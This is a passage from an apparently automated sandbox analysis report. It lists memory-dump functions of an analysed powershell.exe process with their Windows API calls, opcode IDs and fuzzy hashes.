                                                        • Instruction Fuzzy Hash: 7DE012766057049BD750DF0AEC41852F7D4EB84A30B58C47FDC0D8B711D675B505CAA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B923F4, Relevance: .0, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119348986.0000000001B92000.00000040.00000001.sdmp, Offset: 01B92000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dad7635293319c5ca746030f1e99741aeae599e54e8276222b61272fefd2b014
                                                        • Instruction ID: ade20cfd86508403e3b84030c268d070ba6ffc5a02b96d24a09c5e57f71429e0
                                                        • Opcode Fuzzy Hash: dad7635293319c5ca746030f1e99741aeae599e54e8276222b61272fefd2b014
                                                        • Instruction Fuzzy Hash: 75D05E79604A819FEB1A8A1CC1A5B953BA4AF65B04F4684F9E940CB7A3C768E582D200
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01B923BC, Relevance: .0, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119348986.0000000001B92000.00000040.00000001.sdmp, Offset: 01B92000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7d7608e55b0cd4c902bb55cdcd6d8bc13c863482e78ddc9d5852479505ac1510
                                                        • Instruction ID: 743fae32f9fc0ab17c8ff47794633c09042a6c20fce5805a05c0a0e7ec1cc6bd
                                                        • Opcode Fuzzy Hash: 7d7608e55b0cd4c902bb55cdcd6d8bc13c863482e78ddc9d5852479505ac1510
                                                        • Instruction Fuzzy Hash: 3AD05E347046818FEB19CA1CC1D4F597BE4AF40700F0644F8BC008B266C3A4E881C600
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Analysis Process: powershell.exe PID: 3068 Parent PID: 2692 powershell.exeCOMMON

                                                        Executed Functions

                                                        Function 01CAACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01CAAD37
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: 3fad827283429f7333e8b518e12e555d6cb6dadfaf7b8b6d52fde5b40dde74aa
                                                        • Instruction ID: 1cf145aabbbcc612d86b8b532f72a27d2711b52570c898ba90a5bef77f6a6445
                                                        • Opcode Fuzzy Hash: 3fad827283429f7333e8b518e12e555d6cb6dadfaf7b8b6d52fde5b40dde74aa
                                                        • Instruction Fuzzy Hash: 7E21A1765097849FEB238F25DC44B92BFF4EF06314F0884DAE9858B563D271D908DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CAACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01CAAD37
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: 7972443c8d634fe82fc0024b35fd788c5ddefc295d354b970516489ec5b7046c
                                                        • Instruction ID: d9a6762c04c8a3f0b916f733d6343f564099a89e85850fd820d6c6c56228544c
                                                        • Opcode Fuzzy Hash: 7972443c8d634fe82fc0024b35fd788c5ddefc295d354b970516489ec5b7046c
                                                        • Instruction Fuzzy Hash: 48117076900705DFEB21CF55D884B96FBE4EF04325F08C46AED898B662D331E514DBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CAB2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01CAB329
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: f94c7c1afa7f1855ee416658e6c012d702bb4338c2da00a180b49fce6dc5bd8c
                                                        • Instruction ID: 1e03ddd6a7564229b989bd14495ffdd4047a1aa0b2ca0744d82419aec5984061
                                                        • Opcode Fuzzy Hash: f94c7c1afa7f1855ee416658e6c012d702bb4338c2da00a180b49fce6dc5bd8c
                                                        • Instruction Fuzzy Hash: 8211C271509780AFDB228F15DC45F62FFB4EF06224F09C49EED844B663C275A918DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CAB2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01CAB329
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: 2a22e0c5de2ad24d5fc0c7d19397c7aa9d69566e081a3ea29353fb7f45ee0d1f
                                                        • Instruction ID: 83b22201071058a10e6f633db849a69eaec1fd5009ed701a8c7907c0b2ae9eac
                                                        • Opcode Fuzzy Hash: 2a22e0c5de2ad24d5fc0c7d19397c7aa9d69566e081a3ea29353fb7f45ee0d1f
                                                        • Instruction Fuzzy Hash: 7501AD36401B00DFEB228F09D885B61FFA0EF04B25F48C09ADD494B612C675E918DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02890118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028901D0
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: 2da78d2247218c569f06887ba1bb0182234c574f03b0ab115b4467c61f8e1255
                                                        • Instruction ID: a2c5c58e1b88c63ead5e77fa5311ffeebcb86a2d1c45d048802ceed4ba275774
                                                        • Opcode Fuzzy Hash: 2da78d2247218c569f06887ba1bb0182234c574f03b0ab115b4467c61f8e1255
                                                        • Instruction Fuzzy Hash: B1314A7650E7C08FEB138B759C65691BFB4AF43210F0E84DBD884CF1A3D6299809DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0289067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0289072D
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 897e92094551dfb9b235ee509756c1e8b195f8a5d7fd0b389a4a5f4b1b7bc1f0
                                                        • Instruction ID: e789a1ee611aab24b4de6a23726fbb2a5f52b39c6f5aaa2268b47ffb018b37d9
                                                        • Opcode Fuzzy Hash: 897e92094551dfb9b235ee509756c1e8b195f8a5d7fd0b389a4a5f4b1b7bc1f0
                                                        • Instruction Fuzzy Hash: F6317075509380AFE722CF65CC85F52BFF8EF05210F09849EE989DB293D325A808CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02890D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02890DD6
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: b7a37ef7d7604475ad91481f9548af6ab997e2135a4ffba85f78a6cc33a7af5e
                                                        • Instruction ID: 47d7b3bdbc1571434124a1c3850d324bec8512c546c7cefe931a3d706c3f50dc
                                                        • Opcode Fuzzy Hash: b7a37ef7d7604475ad91481f9548af6ab997e2135a4ffba85f78a6cc33a7af5e
                                                        • Instruction Fuzzy Hash: 8931C875509380AFE722CB25DC45B96BFE8DF06214F0884AAE948DF293D375A905C772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CABD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,93CF84E6,00000000,00000000,00000000,00000000), ref: 01CABDBC
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: 6e4a5f32a2122f22ad86de9c921d0395c5605d307bbcef681ea917a5cb7a5ba6
                                                        • Instruction ID: a7649530eac7fa295863132655a81f94c4cd59fa517ddb5a5eb31eba521c3431
                                                        • Opcode Fuzzy Hash: 6e4a5f32a2122f22ad86de9c921d0395c5605d307bbcef681ea917a5cb7a5ba6
                                                        • Instruction Fuzzy Hash: F931C372409380AFE722CB60CC55F96BFB8EF06210F0884DBF984DB193D224A908C7B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CAAF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,93CF84E6,00000000,00000000,00000000,00000000), ref: 01CAAFBE
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: 5497d5f977467fa1ffd7ecfecfb18b0e18caa813b281459ed0d7c26f588271c9
                                                        • Instruction ID: a0734999c59c2774012f12cc082f3fe8fa7bd4c8f8fe7b926153b3742ede25f2
                                                        • Opcode Fuzzy Hash: 5497d5f977467fa1ffd7ecfecfb18b0e18caa813b281459ed0d7c26f588271c9
                                                        • Instruction Fuzzy Hash: A321D2B2509780AFE7138F20DC45B96BFB8EF06324F0884DAE984DB193C225A949C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02890FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0289109E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 4d386374f0150f5f38dfb2f13a1c7ade53800ce18c701389d52b865ddf9a56cb
                                                        • Instruction ID: fa286e1b8026b23a542d0ebcd1b3cd38ac4a25eb3e0ef33f3656ba8222f05b11
                                                        • Opcode Fuzzy Hash: 4d386374f0150f5f38dfb2f13a1c7ade53800ce18c701389d52b865ddf9a56cb
                                                        • Instruction Fuzzy Hash: E131617550E3C05FD3138B358C55B55BFB4AF43610F1A81DBD884CF1A3D629A909C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CAB01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,93CF84E6,00000000,00000000,00000000,00000000), ref: 01CAB0AE
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: 91c623dacffaddaaa99e2193fc6ba946cabf689d7a9ca4f3e2d868e6e53de47d
                                                        • Instruction ID: 4bf1481dd5c1e8a0f5a9cb1eae4cf126c95e4b51e6a8154f369d3b88b3f8694d
                                                        • Opcode Fuzzy Hash: 91c623dacffaddaaa99e2193fc6ba946cabf689d7a9ca4f3e2d868e6e53de47d
                                                        • Instruction Fuzzy Hash: 8E21A6B1545380EFE722CF15CC45FA6BFB8EF06210F08849AE945DB152D664E948CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CAA1A8, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01CAA23E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: 328e7fab32a9b041eaed1c212c81a4da342d6ccab7e3ce75061494d01e4fa4f5
                                                        • Instruction ID: 957c306b65539f42127cde447c62e2aeae4886683902cc82890da56221516bf1
                                                        • Opcode Fuzzy Hash: 328e7fab32a9b041eaed1c212c81a4da342d6ccab7e3ce75061494d01e4fa4f5
                                                        • Instruction Fuzzy Hash: E621C77154D3C1AFD3128B258C55B66BFB4EF47620F0981DBD884CF293D329A919C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02890784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,93CF84E6,00000000,00000000,00000000,00000000), ref: 02890819
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: ae0e9628b17f4b1029d85e0afdd7328c90719b8dd0059fc6c48d9ca2fcb7ae19
                                                        • Instruction ID: da32306fe33575565a6f5f01e371fb2942f93a0acb5f2ef6b9ca7d400a9a8daf
                                                        • Opcode Fuzzy Hash: ae0e9628b17f4b1029d85e0afdd7328c90719b8dd0059fc6c48d9ca2fcb7ae19
                                                        • Instruction Fuzzy Hash: 2521DAB6508780AFE712CB159C45FA3BFA8EF46724F0981DBF9849F193D224A905C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02890464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02890502
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: aecf313b823e24c60b9383a8054d2ec757b16aa28cb01c57fcf54b4a2f7bf6b8
                                                        • Instruction ID: 0881599ea226af550fa1f1d43bf60a2a7c9b31cb170794d5e5dadcb17510c692
                                                        • Opcode Fuzzy Hash: aecf313b823e24c60b9383a8054d2ec757b16aa28cb01c57fcf54b4a2f7bf6b8
                                                        • Instruction Fuzzy Hash: 4D217F7640E7C0AFD3128B358C55B62BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028906AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0289072D
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 0d2716e86114dd0b3a73d455731f44d97481b82abb21c6d88e34f4ec547f0dbd
                                                        • Instruction ID: 6d1866eda213bb5024cdce371e695fbd1771b5bed96345947c8fc0d69b2a788c
                                                        • Opcode Fuzzy Hash: 0d2716e86114dd0b3a73d455731f44d97481b82abb21c6d88e34f4ec547f0dbd
                                                        • Instruction Fuzzy Hash: F421A175500704EFEB20DF65CC85F66FBE8EF08620F08846AE949DB292D332E804CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02890854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,93CF84E6,00000000,00000000,00000000,00000000), ref: 028908E5
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 43c967e615aca91f28125cbb9448df7b978fe94d88d0e31385692c24e0273bdb
                                                        • Instruction ID: 3b012205eb5b36d8219ede074b7244281d08babe6fe83ccb3195c6a7ac534935
                                                        • Opcode Fuzzy Hash: 43c967e615aca91f28125cbb9448df7b978fe94d88d0e31385692c24e0273bdb
                                                        • Instruction Fuzzy Hash: F0219276409380AFEB22CF51DC45F96FFB8EF06314F09849BE9449B193C265A909CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CAA8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01CAA94A
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: d99c9e34414a640f1a2202d996d5436d1697d514ecda3f4eae7eccb5a70b5243
                                                        • Instruction ID: 6b7d1fe930ac4bc98689eb0e72f39531eff526503e528da183e52cce3b7088da
                                                        • Opcode Fuzzy Hash: d99c9e34414a640f1a2202d996d5436d1697d514ecda3f4eae7eccb5a70b5243
                                                        • Instruction Fuzzy Hash: AC21A77540D780AFD3138B25DC51B62BFB4EF87710F0981DBE8849B653D224A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02890D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02890DD6
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: a4d3f31583023163b27a4556fd26ff4856f7edc035290d10022846d4e4c06581
                                                        • Instruction ID: 6e9c2d0a089dcf161db6fd1cd986de9740e03945ccde3d16cb7e495c631aa019
                                                        • Opcode Fuzzy Hash: a4d3f31583023163b27a4556fd26ff4856f7edc035290d10022846d4e4c06581
                                                        • Instruction Fuzzy Hash: 0021A175600304AFFB20DF29CC85BA6FBD8EF04614F08856AE948DB282D775F904CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CABD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,93CF84E6,00000000,00000000,00000000,00000000), ref: 01CABDBC
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: 4f773806506601953c17398344986b7113772216148bc5449332e090906506b2
                                                        • Instruction ID: ccdee6141ac073d8003a1a9f8fae5e500f9aa517a8970f3912ecc13ae74093d4
                                                        • Opcode Fuzzy Hash: 4f773806506601953c17398344986b7113772216148bc5449332e090906506b2
                                                        • Instruction Fuzzy Hash: 57119D72500704EFEB22DF55DC85FAAFBA8EF04324F04856AFA45DA141D674E904CBB2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CAB04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,93CF84E6,00000000,00000000,00000000,00000000), ref: 01CAB0AE
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: c20e829e01e3e1874ae30d462f2f11337025ac11c8f502419deb53ba97272e06
                                                        • Instruction ID: 9b70dcb6d74fdff511a558615aba5e847535782647c1cbea020d88654f3a24cc
                                                        • Opcode Fuzzy Hash: c20e829e01e3e1874ae30d462f2f11337025ac11c8f502419deb53ba97272e06
                                                        • Instruction Fuzzy Hash: 311181B1600704EFEB21CF55DC85FA6FBE8EF05664F14846AED05DB241D674E9048B71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02890F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02890FB0
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 665bd89ff4dc5183a0adffca0d0a1f10cdca395e82e54ed252903e3e4986abcc
                                                        • Instruction ID: 7db4dfb5cf9c4adb0049446117c584acbcb0534e4e8d9a1e9324a23902ef0cd2
                                                        • Opcode Fuzzy Hash: 665bd89ff4dc5183a0adffca0d0a1f10cdca395e82e54ed252903e3e4986abcc
                                                        • Instruction Fuzzy Hash: 69215E7550D7C09FDB128B25DC55B92BFB4AF03214F0D84DAD888CF693D2659908C762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0289137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: b0559c8db4fe4756a92831e067895d8e3b6d4e9659d6639f471346e3b3d81434
                                                        • Instruction ID: 52cab2cc94f4239f03eb2e0929e6c2f9e1ddc920a3de72e9c0cbf67c534d370a
                                                        • Opcode Fuzzy Hash: b0559c8db4fe4756a92831e067895d8e3b6d4e9659d6639f471346e3b3d81434
                                                        • Instruction Fuzzy Hash: 262192765087809FDB21CF25DC45B96FFF4EF06220F08849AED898B562D235A449DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CAAAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01CAAB1A
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: c7376c36bb1619bc3ec40d2481ce96e4b16f6175a046f474a99ca5d2648f3289
                                                        • Instruction ID: 8fcf3902b2581f8aa7b2ab98e64c27cf94dac1f4d96bfa1fb365430e12bdfba3
                                                        • Opcode Fuzzy Hash: c7376c36bb1619bc3ec40d2481ce96e4b16f6175a046f474a99ca5d2648f3289
                                                        • Instruction Fuzzy Hash: 0E21A2716053819FE722CF29DC44B52BFE8EF06214F0884AAED49DB653D265E804CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CABABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        • Opcode ID: a12437af8dbe400d26f82f6a67cae92db1c2f6a3e846d5d051a9c33b6fe027d7
                                                        • Instruction ID: 208c80a4659a1ece7d81297fcb8a9ee8492498974d2f823388d4664de8ccf86e
                                                        • Opcode Fuzzy Hash: a12437af8dbe400d26f82f6a67cae92db1c2f6a3e846d5d051a9c33b6fe027d7
                                                        • Instruction Fuzzy Hash: 18219F725093C09FEB128B25DC55B92BFA4EF07220F0984DADD858F263D234A908DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028910D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02891148
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: e304e67622fda09dbbf24347dd39de5a77a46c52cfdc7bf9cd0eb9ee96b933b6
                                                        • Instruction ID: d1914fbbbf0f53a23e06080a3e26f4f62637177f4727ea96da2d018059566ab9
                                                        • Opcode Fuzzy Hash: e304e67622fda09dbbf24347dd39de5a77a46c52cfdc7bf9cd0eb9ee96b933b6
                                                        • Instruction Fuzzy Hash: 7A216D7540D7C0AFD7138B259C54A62BFB4EF57620F0D80DBD8898F2A3D2695808D772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CAAF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,93CF84E6,00000000,00000000,00000000,00000000), ref: 01CAAFBE
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: 266addd13353683a7730a43dbed278a592fb90a39b30142896b76ee2c2b4a12c
                                                        • Instruction ID: 85718dfed9d4494769a381061e8aaf383716efca22950f0bf4fbd5bf2d5aec5a
                                                        • Opcode Fuzzy Hash: 266addd13353683a7730a43dbed278a592fb90a39b30142896b76ee2c2b4a12c
                                                        • Instruction Fuzzy Hash: CA11B272500700EFEB22DF55DC45BAAFBA8EF44724F14846AE9059B181D674E904CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CABA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01CABA7E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: d35342f9226fc693571ee7249b3e153cf245eed83fd54339d8e6abe7f91a0765
                                                        • Instruction ID: 188c3dadba5e3805b92497f146231373b8e135d1f3dd0750c0a64111cbacaa13
                                                        • Opcode Fuzzy Hash: d35342f9226fc693571ee7249b3e153cf245eed83fd54339d8e6abe7f91a0765
                                                        • Instruction Fuzzy Hash: DB11AF72508780AFDB22CF65CC45B92FFF4EF05210F08849EE9898B662D375E818CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02890886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,93CF84E6,00000000,00000000,00000000,00000000), ref: 028908E5
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
